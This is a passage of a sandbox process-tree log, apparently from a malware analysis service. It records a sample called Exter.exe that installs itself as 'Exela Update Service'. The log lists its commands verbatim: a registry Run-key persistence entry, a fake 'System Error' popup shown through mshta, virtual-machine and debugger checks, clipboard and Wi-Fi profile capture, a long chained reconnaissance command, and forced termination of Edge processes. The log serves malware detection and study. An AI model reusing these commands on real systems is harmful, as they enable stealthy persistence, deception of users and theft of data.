- Event Triggered Execution: Netsh Helper DLL
PID:2436
-
-
C:\Windows\system32\netsh.exenetsh firewall show config4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4048
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:1544
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:3372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:1760
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:852
-
-
-
-
C:\Users\Admin\Desktop\Exter\Exter.exe"C:\Users\Admin\Desktop\Exter\Exter.exe"1⤵PID:1376
-
C:\Users\Admin\Desktop\Exter\Exter.exe"C:\Users\Admin\Desktop\Exter\Exter.exe"2⤵
- Loads dropped DLL
PID:2228 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"3⤵PID:1796
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:552
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:3932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"3⤵PID:3756
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get Manufacturer4⤵PID:1428
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "gdb --version"3⤵PID:460
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"3⤵PID:3144
-
C:\Windows\system32\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
PID:1628
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"3⤵PID:2136
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_ComputerSystem get Manufacturer4⤵PID:2888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:4316
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:1160
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"3⤵PID:3960
-
C:\Windows\system32\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
PID:3796
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f"3⤵PID:1100
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f4⤵
- Adds Run key to start application
PID:1424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""3⤵PID:1304
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"4⤵PID:3416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"3⤵PID:1756
-
C:\Windows\system32\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
PID:8
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"3⤵PID:1932
-
C:\Windows\system32\cmd.execmd.exe /c chcp4⤵PID:1524
-
C:\Windows\system32\chcp.comchcp5⤵PID:2300
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"3⤵PID:1204
-
C:\Windows\system32\cmd.execmd.exe /c chcp4⤵PID:3552
-
C:\Windows\system32\chcp.comchcp5⤵PID:2732
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:3012
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"3⤵PID:3028
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Get-Clipboard4⤵
- Suspicious behavior: EnumeratesProcesses
PID:480
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"3⤵PID:3448
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:4844
-
-
C:\Windows\system32\HOSTNAME.EXEhostname4⤵PID:4652
-
-
C:\Windows\System32\Wbem\WMIC.exewmic logicaldisk get caption,description,providername4⤵
- Collects information from the system
PID:4520
-
-
C:\Windows\system32\net.exenet user4⤵PID:3864
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user5⤵PID:4968
-
-
-
C:\Windows\system32\query.exequery user4⤵PID:4588
-
C:\Windows\system32\quser.exe"C:\Windows\system32\quser.exe"5⤵PID:3748
-
-
-
C:\Windows\system32\net.exenet localgroup4⤵PID:1856
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup5⤵PID:2592
-
-
-
C:\Windows\system32\net.exenet localgroup administrators4⤵PID:1428
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators5⤵PID:4744
-
-
-
C:\Windows\system32\net.exenet user guest4⤵PID:4856
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user guest5⤵PID:4464
-
-
-
C:\Windows\system32\net.exenet user administrator4⤵PID:4080
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user administrator5⤵PID:1320
-
-
-
C:\Windows\System32\Wbem\WMIC.exewmic startup get caption,command4⤵PID:2948
-
-
C:\Windows\system32\tasklist.exetasklist /svc4⤵
- Enumerates processes with tasklist
PID:700
-
-
C:\Windows\system32\ipconfig.exeipconfig /all4⤵
- Gathers network information
PID:4752
-
-
C:\Windows\system32\ROUTE.EXEroute print4⤵PID:4048
-
-
C:\Windows\system32\ARP.EXEarp -a4⤵PID:3740
-
-
C:\Windows\system32\NETSTAT.EXEnetstat -ano4⤵
- Gathers network information
PID:4872
-
-
C:\Windows\system32\sc.exesc query type= service state= all4⤵
- Launches sc.exe
PID:2092
-
-
C:\Windows\system32\netsh.exenetsh firewall show state4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1160
-
-
C:\Windows\system32\netsh.exenetsh firewall show config4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profiles"3⤵PID:3052
-
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:4860
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:1044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:3696
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:2504
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:1676 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc77a73cb8,0x7ffc77a73cc8,0x7ffc77a73cd82⤵PID:2724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1768,11595530837174044139,7717420262841312829,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1880 /prefetch:22⤵PID:660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1768,11595530837174044139,7717420262841312829,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1768,11595530837174044139,7717420262841312829,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:82⤵PID:1796
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1768,11595530837174044139,7717420262841312829,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:12⤵PID:4408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1768,11595530837174044139,7717420262841312829,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:12⤵PID:816
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1768,11595530837174044139,7717420262841312829,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3828 /prefetch:12⤵PID:1552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1768,11595530837174044139,7717420262841312829,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:12⤵PID:4172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1768,11595530837174044139,7717420262841312829,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3684 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1768,11595530837174044139,7717420262841312829,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3484 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1768,11595530837174044139,7717420262841312829,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3508 /prefetch:12⤵PID:1404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1768,11595530837174044139,7717420262841312829,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3612 /prefetch:12⤵PID:2908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1768,11595530837174044139,7717420262841312829,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5444 /prefetch:12⤵PID:460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1768,11595530837174044139,7717420262841312829,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5572 /prefetch:12⤵PID:1856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1768,11595530837174044139,7717420262841312829,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5932 /prefetch:82⤵PID:3144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1768,11595530837174044139,7717420262841312829,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5948 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1768,11595530837174044139,7717420262841312829,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:12⤵PID:4300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1768,11595530837174044139,7717420262841312829,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:12⤵PID:3560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1768,11595530837174044139,7717420262841312829,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:12⤵PID:964
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1768,11595530837174044139,7717420262841312829,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3076 /prefetch:12⤵PID:1856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1768,11595530837174044139,7717420262841312829,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1776 /prefetch:12⤵PID:4628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1768,11595530837174044139,7717420262841312829,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:12⤵PID:1304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1768,11595530837174044139,7717420262841312829,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:12⤵PID:1100
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1532
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:648
-
C:\Users\Admin\Desktop\Exter\Exter.exe"C:\Users\Admin\Desktop\Exter\Exter.exe"1⤵PID:3400
-
C:\Users\Admin\Desktop\Exter\Exter.exe"C:\Users\Admin\Desktop\Exter\Exter.exe"2⤵
- Loads dropped DLL
PID:4852 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"3⤵PID:1960
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:3696
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:2256
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"3⤵PID:3336
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get Manufacturer4⤵PID:3360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "gdb --version"3⤵PID:4640
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"3⤵PID:824
-
C:\Windows\system32\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
PID:4056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"3⤵PID:3172
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_ComputerSystem get Manufacturer4⤵PID:3740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:1688
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:4912
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"3⤵PID:1484
-
C:\Windows\system32\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
PID:4744
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f"3⤵PID:1764
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f4⤵
- Adds Run key to start application
PID:4788
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""3⤵PID:420
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"4⤵PID:932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"3⤵PID:4940
-
C:\Windows\system32\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
PID:2980
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1676"3⤵PID:4868
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 16764⤵
- Kills process with taskkill
PID:4872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2724"3⤵PID:4448
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 27244⤵
- Kills process with taskkill
PID:1396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 660"3⤵PID:3116
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 6604⤵
- Kills process with taskkill
PID:4628
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4016"3⤵PID:4056
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 40164⤵
- Kills process with taskkill
PID:4692
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1796"3⤵PID:2592
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4912
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 17964⤵
- Kills process with taskkill
PID:4608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1552"3⤵PID:1968
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4744
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 15524⤵
- Kills process with taskkill
PID:540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3144"3⤵PID:1060
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 31444⤵
- Kills process with taskkill
PID:4580
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1304"3⤵PID:3216
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 13044⤵
- Kills process with taskkill
PID:4908
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1100"3⤵PID:4968
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 11004⤵
- Kills process with taskkill
PID:2696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"3⤵PID:2856
-
C:\Windows\system32\cmd.execmd.exe /c chcp4⤵PID:3364
-
C:\Windows\system32\chcp.comchcp5⤵PID:2244
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"3⤵PID:3648
-
C:\Windows\system32\cmd.execmd.exe /c chcp4⤵PID:4140
-
C:\Windows\system32\chcp.comchcp5⤵PID:1828
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:4016
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4172
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"3⤵PID:1216
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Get-Clipboard4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1544
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profiles"3⤵PID:4004
-
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4176
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"3⤵PID:384
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:2912
-
-
C:\Windows\system32\HOSTNAME.EXEhostname4⤵PID:3172
-
-
C:\Windows\System32\Wbem\WMIC.exewmic logicaldisk get caption,description,providername4⤵
- Collects information from the system
PID:3064
-
-
C:\Windows\system32\net.exenet user4⤵PID:3416
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user5⤵PID:4520
-
-
-
C:\Windows\system32\query.exequery user4⤵PID:700
-
C:\Windows\system32\quser.exe"C:\Windows\system32\quser.exe"5⤵PID:4412
-
-
-
C:\Windows\system32\net.exenet localgroup4⤵PID:2164
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup5⤵PID:1100
-
-
-
C:\Windows\system32\net.exenet localgroup administrators4⤵PID:2888
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators5⤵PID:4376
-
-
-
C:\Windows\system32\net.exenet user guest4⤵PID:3828
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user guest5⤵PID:460
-
-
-
C:\Windows\system32\net.exenet user administrator4⤵PID:2560
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user administrator5⤵PID:4608
-
-
-
C:\Windows\System32\Wbem\WMIC.exewmic startup get caption,command4⤵PID:1964
-
-
C:\Windows\system32\tasklist.exetasklist /svc4⤵
- Enumerates processes with tasklist
PID:4084
-
-
C:\Windows\system32\ipconfig.exeipconfig /all4⤵
- Gathers network information
PID:3448
-
-
C:\Windows\system32\ROUTE.EXEroute print4⤵PID:3740
-
-
C:\Windows\system32\ARP.EXEarp -a4⤵PID:1952
-
-
C:\Windows\system32\NETSTAT.EXEnetstat -ano4⤵
- Gathers network information
PID:3336
-
-
C:\Windows\system32\sc.exesc query type= service state= all4⤵
- Launches sc.exe
PID:2860
-
-
C:\Windows\system32\netsh.exenetsh firewall show state4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1896
-
-
C:\Windows\system32\netsh.exenetsh firewall show config4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3752
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:4332
-
